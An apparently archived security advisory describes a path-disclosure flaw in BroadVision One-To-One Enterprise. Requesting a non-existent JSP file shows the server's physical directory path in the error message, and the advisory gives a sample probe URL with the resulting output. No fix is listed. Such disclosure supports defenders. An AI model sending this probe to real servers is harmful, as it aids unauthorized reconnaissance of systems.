COMMAND

    BroadVision

SYSTEMS AFFECTED

    BroadVision One-To-One Enterprise (Maybe all vesions)

PROBLEM

    Ben Jurry found following.  BroadVision One-To-One Enterprise  are
    architected from the ground up using open industry standards,  are
    inherently  distributable,  and  easily  tailored  to  fit  unique
    business needs.  The key benefits of Java technologies -- ease  of
    programming,  interoperability  and  connectivity  --  are core to
    BroadVision's product philosophy.  There are many webs using  this
    software include GE Supply.

    BroadVision One-To-One Enterprise  contains a vulnerability  which
    reveals server information.   Requesting a non-existent file,  the
    server will reveal the physical path of server files as following:

        "Script /appl/bv1to1/bv1to1_var/script-root/login/benjurry.jsp failed, reason unknown "

    Exploit:

        http://target/benjurry.jsp

        Script /appl/bv1to1/bv1to1_var/script-root/login/benjurry.jsp failed, reason unknown

SOLUTION

    Nothing yet.